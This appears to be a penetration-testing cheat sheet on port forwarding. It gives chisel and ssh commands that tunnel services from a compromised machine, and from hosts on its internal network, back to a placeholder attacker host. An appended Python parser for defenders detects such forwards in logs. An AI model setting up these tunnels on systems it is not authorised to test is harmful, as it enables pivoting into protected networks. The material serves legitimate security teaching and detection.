Port Forwarding

Port forwarding is a technique in which a service running on the target machine, or on any other machine on its network, is forwarded to the attacker's machine, where it can then be accessed locally.

Commonly used tools

  • Chisel

  • SSH

Local Port Forwarding

Local port forwarding forwards a service running on the compromised machine to the attacker's machine.

Chisel

Attacker's Machine:

./chisel server -p 1337 --reverse

Compromised Machine:

# Forward the service on the compromised machine's port 5000 to port 5000 on the attacker's machine
./chisel client attackerip:1337 R:5000:127.0.0.1:5000

SSH

# The same with SSH
# Format: ssh -L attackermachineport:127.0.0.1:targetserviceport user@target
ssh -L 5000:127.0.0.1:5000 user@targetIP

Remote Port Forwarding

Remote port forwarding forwards a service running on a machine that is present on the same network as the compromised machine to the attacker's machine.

Network Setup:

Machine A : Attacker's Machine

Machine B : Compromised Machine ( Has a network card to communicate with the Y network )

Machine C : Machine on the Y network

A ---> B ( Attacker can communicate with Machine B )

B ---> C ( Machine B can communicate with both A and C with different network cards )

A --x-> C ( Attacker cannot communicate with the C since they are

Chisel

Attacker's Machine:

./chisel server -p 9001 --reverse

Compromised Machine ( Machine B ):

# Machine C has a service on its port 3000 which has to be forwarded to port 3000 on the attacker's machine
# Remote format: R:listenport:destinationhost:destinationport
./chisel client attackerip:9001 R:3000:machineCIP:3000

SSH

# The same can be performed with SSH, run from Machine B with the attacker's machine as the SSH server
# Format: ssh -R [REMOTE:]REMOTE_PORT:DESTINATION:DESTINATION_PORT [USER@]SSH_SERVER
ssh -R 3000:machineCIP:3000 user@attackerip

Dynamic Port Forwarding

Dynamic port forwarding is a pivoting technique that gives the attacker full access to the services running on the compromised system through proxychains.
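
Added example (not part of the original page): a small Python parser a defender can run over command lines captured from process or shell-history logs, to recognise the ssh and chisel forward specifications used on this page and report which endpoint opens the listening port and where the traffic is sent. The function names and sample lines are constructed for illustration; bracketed IPv6 addresses and chisel's socks remotes are not handled.

```python
import shlex

# ssh flag -> (forward mode, endpoint that opens the listening port)
SSH_FLAGS = {"-L": ("local", "ssh client"), "-R": ("remote", "ssh server"),
             "-D": ("dynamic", "ssh client")}

def parse_spec(spec):
    """Split [bind:]port[:host:hostport]; return None if it is not a forward spec."""
    parts = spec.split(":")
    bind = None                          # None: the tool's default bind address
    if len(parts) in (2, 4):             # explicit bind address given
        bind, parts = parts[0], parts[1:]
    if len(parts) not in (1, 3) or not parts[0].isdigit():
        return None
    dest = ":".join(parts[1:]) or None   # None: no fixed destination (SOCKS)
    return bind, int(parts[0]), dest

def find_forwards(cmdline):
    """Return (tool, mode, listener, bind, port, dest) for each forward found."""
    argv = shlex.split(cmdline)
    tool = argv[0].rsplit("/", 1)[-1] if argv else ""
    found = []
    if tool == "ssh":
        for i, arg in enumerate(argv):
            if arg[:2] in SSH_FLAGS:     # accepts "-L spec" and "-Lspec"
                spec = arg[2:] or (argv[i + 1] if i + 1 < len(argv) else "")
                parsed = parse_spec(spec)
                if parsed:
                    found.append((tool,) + SSH_FLAGS[arg[:2]] + parsed)
    elif tool == "chisel" and argv[1:2] == ["client"]:
        for arg in argv[2:]:
            reverse = arg.startswith("R:")
            parsed = parse_spec(arg[2:] if reverse else arg)
            if parsed and parsed[2]:     # a remote needs an explicit destination
                side = ("reverse", "chisel server") if reverse else ("local", "chisel client")
                found.append((tool,) + side + parsed)
    return found

# Constructed sample command lines, using this page's placeholder hosts.
SAMPLES = [
    "./chisel client attackerip:1337 R:5000:127.0.0.1:5000",
    "ssh -L 5000:127.0.0.1:5000 user@targetIP",
    "ssh -R 127.0.0.1:3000:machineCIP:3000 user@attackerip",
]

if __name__ == "__main__":
    for line in SAMPLES:
        for tool, mode, listener, bind, port, dest in find_forwards(line):
            print(f"{tool} {mode}: {listener} listens on {bind or '(default)'}:{port} -> {dest or 'SOCKS'}")
```

A listener reported on the ssh server or chisel server side means the port opens on the far end of the tunnel, which is the case worth alerting on when that far end is outside the network.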
